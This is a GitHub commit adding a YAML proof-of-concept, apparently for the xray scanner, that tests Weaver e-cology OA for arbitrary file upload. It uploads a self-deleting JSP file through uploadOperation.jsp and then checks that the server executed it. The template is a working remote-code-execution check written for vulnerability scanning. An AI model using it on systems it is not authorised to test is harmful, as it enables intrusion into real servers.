Weaver oa arbitrary file upload (chaitin#1171)

* Create weaver-oa-arbitrary-file-upload.yml * Update weaver-oa-arbitrary-file-upload.yml * Update weaver-oa-arbitrary-file-upload.yml * transform to v2 * rename Co-authored-by: smile-jpg <[email protected]>
kylincodelab · Nov 3, 2021 · cc20138 · cc20138
1 parent e7da946
commit cc20138
Showing 1 changed file with 28 additions and 0 deletions.
diff --git a/pocs/ecology-arbitrary-file-upload.yml b/pocs/ecology-arbitrary-file-upload.yml
@@ -0,0 +1,28 @@
+name: poc-yaml-ecology-arbitrary-file-upload
+manual: true
+transport: http
+set:
+    r1: randomLowercase(4)
+    r2: randomInt(40000, 44800)
+    r3: randomInt(40000, 44800)
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /page/exportImport/uploadOperation.jsp
+            headers:
+                Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
+            body: "--b0d829daa06c13d6b3e16b0ad21d1eed\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{r1}}.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n--b0d829daa06c13d6b3e16b0ad21d1eed--\r\n\r\n"
+        expression: response.status == 200
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /page/exportImport/fileTransfer/{{r1}}.jsp
+        expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
+expression: r0() && r1()
+detail:
+    author: jingling(https://github.com/shmilylty)
+    links:
+        - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g